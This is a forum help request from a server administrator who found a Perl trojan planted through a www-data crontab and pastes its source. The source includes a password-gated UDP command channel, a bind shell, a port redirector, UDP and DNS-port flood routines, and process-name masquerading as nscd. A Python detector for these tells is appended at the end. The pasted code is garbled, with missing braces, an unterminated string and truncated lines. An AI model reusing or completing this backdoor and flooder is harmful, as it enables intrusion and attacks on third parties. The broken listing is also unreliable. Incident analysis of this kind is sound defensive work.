
a weird script worm uploaded via php with debian 3.0 ?

I logged in to my server today to find that
/usr/sbin/nscd was running about 50 copies;
since I don't have BIND installed, obviously
something was up... they were also running as
the user www-data...
After a little bit of research I found a new
crontab entry
File: /tmp/crontab.XXXXLYukbF
0 * * * * /tmp/.nscdrecover

this starts at
auth.log.0:Jun  6 17:00:01 debian PAM_unix[26934]: (cron) session opened for user www-data by (uid=0)
auth.log.0:Jun  6 17:00:02 debian PAM_unix[26934]: (cron) session closed for user www-data
and runs every hour

and under SYSLOG it starts

syslog.3:Jun  6 16:27:27 debian crontab[26795]: (www-data) LIST (www-data)
syslog.3:Jun  6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)
syslog.3:Jun  6 16:27:34 debian crontab[26804]: (www-data) LIST (www-data)
syslog.3:Jun  6 16:27:34 debian crontab[26807]: (www-data) REPLACE (www-data)
syslog.3:Jun  6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD

so I found /tmp/.nscdrecover and it looks like
some kind of port scanner/trojan

the contents are pasted below

#!/usr/bin/perl -w

$pass = "J9YcGEyNypkzI";
$str = 'Mess with the best - die like a
use IO::Socket;
use IO::Select;
use POSIX;

sub redir
my $port = shift;
my $dest = shift;
$SIG{ALRM} = sub { exit };
        alarm 60;
$sa = IO::Socket::INET->new( Proto => "tcp",
Listen => 1, ReuseAddr => 1,               
LocalPort =>$port) or exit;
        $sin = $sa->accept or exit;
        alarm 0;
$sout = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $dest) or exit;
$sin->autoflush(1);
$sel = IO::Select->new($sin, $sout);
while(@sock = $sel->can_read(180)) {
    foreach $s(@sock) {
        $buf = <$s>; exit unless($buf);
        print $sout $buf if($s eq $sin);
        print $sin $buf if($s eq $sout);

sub shell
my $port = shift;
$SIG{ALRM} = sub { exit };
        alarm 60;
use Socket;
        socket(S, PF_INET, SOCK_STREAM, 0);
        setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
        bind(S, sockaddr_in($port, INADDR_ANY));
        listen(S, 1);
        accept(X, S);
        alarm 0;
        open STDIN, "<&X";
        open STDOUT, ">&X";
        open STDERR, ">&X";
        close X;

sub udp
my $host = shift;
my $time = shift;
        $sock = IO::Socket::INET->new(Proto => 'udp', PeerAddr => $host,
                                      PeerPort => int(rand 65535)) or exit;
        $sock->autoflush(1);
        $SIG{ALRM} = sub { exit };
        alarm 15 unless(alarm $time);
        print $sock $str while(1);

sub ddns
my $host = shift;
my $time = shift;
        $sock = new IO::Socket::INET->new(Proto
        => 'udp', PeerAddr => $host,
        PeerPort => 53) or exit;
        $SIG{ALRM} = sub { exit };
        alarm 15 unless(alarm $time);
while(1) {
        my $s = int(rand(89)+10);
        my $r1 = int(rand(89)+10);
        my $r2 = int(rand(89)+10);
        my $r3 = int(rand(89)+10);
        my $r4 = int(rand(89)+10);

$0 = '/usr/sbin/nscd'.' 'x100;
exit if fork;
open STDIN, "</dev/null";
open STDOUT, ">/dev/null";
open STDERR, ">/dev/null";

$csock = IO::Socket::INET->new(Proto => 'udp',
LocalPort => 1337, ReuseAddr => 1) or exit;
while($string = <$csock>)
        my ($pw, $cmd, $arg1, $arg2) = split "
        ", $string;
        next unless($cmd);
        next unless($arg1);
        next unless(crypt($pw, $pass) eq $pass);
        if ($cmd eq "ping") {
            my $bsock = IO::Socket::INET->new(Proto => 'udp', PeerAddr => $arg1,
                                              PeerPort => $arg2, ReuseAddr => 1) or
            print $bsock "pong ".`uname -mnrs`;
            close $bsock;
        } elsif ($cmd eq "die") {
            exit if(crypt($arg1, $pass) eq $pass);
        } elsif ($cmd eq "redir") {
            redir($arg1, $arg2) unless(fork);
        } elsif ($cmd eq "shell") {
            shell($arg1) unless(fork);
        } elsif ($cmd eq "udp") {
            udp($arg1, $arg2) unless(fork);
        } elsif ($cmd eq "ddns") {
            ddns($arg1, $arg2) unless(fork);

A little history is that my server was hacked
with some trojan that was sending out SPAM and I
did a fresh reinstall with Debian so I could
have automatic updates and the like. I copied
over a few of the home directories from the old
site. Then this all started after a user logged
in on Friday June 6th; first login at 14:16 ending
14:24, the script starts at 14:27

worldspe ftpd26405    pm6-s104.amazon. Fri Jun  6 15:06 - 15:06  (00:00)
worldspe ftpd26325    pm6-s104.amazon. Fri Jun  6 14:51 - 14:51  (00:00)
worldspe ftpd26315    pm6-s104.amazon. Fri Jun  6 14:49 - 14:49  (00:00)
worldspe ftpd26291    pm6-s104.amazon. Fri Jun  6 14:43 - 14:44  (00:00)
worldspe ftpd26183    pm6-s104.amazon. Fri Jun  6 14:16 - 14:24  (00:07)

The question is, could this have been started via a
PHP script, and if so what should I look for in
order to neutralize it and communicate with this
user?
I already moved the /tmp file out.

While grepping the PHP files I found nothing that
had /tmp or ncsd listed in it at all. This is
just kind of weird, and I was wondering if
anybody could be of help. Also no other files or
cgi-bin files were uploaded, so it might just be
a coincidence, but my logic points to it being
something that happened via something that was

I just don't know where this came from. I am
running Debian 3.0 woody with all security
update files. I ran rtkitchk and found nothing.
So I'm really perplexed as to what could have got
this script on the server. Any help would be
greatly appreciated as I found nothing about
this script by google.
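A defender-side check for the two tells in this post, as an added example that is not part of the original message: a crontab replaced by the www-data service account with a job that runs out of /tmp, and a process whose argv has been rewritten (the script's `$0 = '/usr/sbin/nscd'`) to look like nscd while the kernel still reports its real program name. The log and `ps` lines are constructed to mirror the ones quoted above; the service-account set is an assumption.

```python
import re
from typing import List

# Constructed sample lines modelled on the syslog excerpt quoted in the post
# (the "syslog.3:" prefix is grep output, not part of the log record).
SYSLOG = """\
syslog.3:Jun  6 16:27:27 debian crontab[26795]: (www-data) LIST (www-data)
syslog.3:Jun  6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)
syslog.3:Jun  6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/.nscdrecover)
syslog.3:Jun  6 17:05:01 debian /USR/SBIN/CRON[26990]: (root) CMD (run-parts /etc/cron.hourly)
"""

# Constructed `ps -eo user,comm,args` output. Setting $0 in Perl rewrites the
# argv seen by ps (args) but not the kernel's comm field, so they disagree.
PS = """\
USER     COMMAND         COMMAND
root     cron            /usr/sbin/cron
www-data perl            /usr/sbin/nscd
www-data apache          /usr/sbin/apache
"""

SERVICE_ACCOUNTS = {"www-data", "nobody"}  # assumption: accounts that never edit crontabs
CRON_RE = re.compile(r"^(?:[^:]+:)?(\w{3}\s+\d+ [\d:]+) \S+ "
                     r"(crontab|/USR/SBIN/CRON)\[\d+\]: \((\S+)\) (\w+) \((.*)\)$")

def cron_alerts(log: str) -> List[str]:
    """Flag crontab REPLACE by a service account and cron jobs run from /tmp-like dirs."""
    alerts = []
    for line in log.splitlines():
        m = CRON_RE.match(line)
        if not m:
            continue
        ts, src, user, action, arg = m.groups()
        if src == "crontab" and action == "REPLACE" and user in SERVICE_ACCOUNTS:
            alerts.append(f"{ts}: crontab replaced by service account {user}")
        if action == "CMD" and re.search(r"(^|\s)/(tmp|var/tmp|dev/shm)/", arg):
            alerts.append(f"{ts}: cron job for {user} runs from a world-writable dir: {arg}")
    return alerts

def masquerade_alerts(ps_output: str) -> List[str]:
    """Flag processes whose argv[0] basename does not match the kernel comm name."""
    alerts = []
    for line in ps_output.splitlines()[1:]:          # skip the ps header
        user, comm, args = line.split(None, 2)
        argv0 = args.split()[0].rsplit("/", 1)[-1]
        if not argv0.startswith(comm):               # comm is truncated to 15 chars
            alerts.append(f"{user}: comm '{comm}' but argv claims '{args}'")
    return alerts
```

On a live system, feed it `grep -h 'crontab\|CRON' /var/log/syslog*` and `ps -eo user,comm,args`; the comm/argv mismatch is a Linux-specific heuristic and legitimate programs that rename themselves (e.g. some daemons) will need whitelisting.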
